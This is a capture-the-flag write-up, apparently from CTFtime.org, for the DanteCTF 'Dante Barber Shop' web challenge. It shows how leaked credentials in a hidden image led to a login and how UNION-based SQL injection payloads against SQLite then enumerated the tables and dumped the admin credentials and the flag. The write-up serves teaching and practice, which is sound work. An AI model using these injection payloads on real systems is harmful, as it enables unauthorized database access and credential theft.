CTFtime.org

Dante Barber Shop

by Mj0ln1r / Invaders0x1

Tags: web mj0ln1r sqlinjection invaders0x1 

Rating:

Dante Barber Shop

Description :

Welcome to our renowned barber shop!
Your task, should you choose to accept it, is to uncover hidden information and retrieve the sensitive data that the owners may have left around.

Challenge : https://barbershop.challs.dantectf.it

The website presents few photos and a login page. Viewing the source code reveals that there is an another image which was not showed in the website.

<img src="img/barber2.jpg" alt="Barber Shop">
<img src="img/barber3.jpg" alt="Barber Shop">
<img src="img/barber4.jpg" alt="Barber Shop">
<img src="img/barber5.jpg" alt="Barber Shop">
<img src="img/barber6.jpg" alt="Barber Shop">
<img src="img/barber7.jpg" alt="Barber Shop">

Okay the img/barber1.jpg was not displayed here. By trying to access it revealed the barber credentials.

https://barbershop.challs.dantectf.it/img/barber1.jpg

Barber

Used barber : dant3barbersh0p_cLIVeSidag to login. A customer database was displayed and a search field was available to search for the entries.

When I searh for ' in the search field a sqlite3 error were displayed. So, It was confirmed that the SQL Injection vulnerability in the system.

  • Then I enumerated the number of columns with the UNION.

    • Payload ' union select 1,2,3,4-- Confirms that there were 4 columns available.

  • Enumerating table name

    • Payload ' union select 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type = "table"-- returned the column names users,sqlite_sequence,customers

  • Selected columns from table

    • Payload ' union select 1,sql,3,4 from sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name='users'-- confirms the columns names id,username,password.

  • So now we have table name as well as column name, final thing which we need to do is, extraction of data from the desired column which can be performed by simple SQL query.

    • Payload 'union SELECT 1,username,password,4 FROM users-- printed the admin crendentials on the screen.

    • admin : nSOrowLIstERiMbrUsHConesueyeadEr

When I logged in to the website with admin credentials, the flag was displayed in the admin dashboard.

Flag : DANTE{dant3_1s_inj3cting_everyb0dy_aaxxaa}

Original Writeup

Original writeup (https://themj0ln1r.github.io/posts/dantectf23).

Comments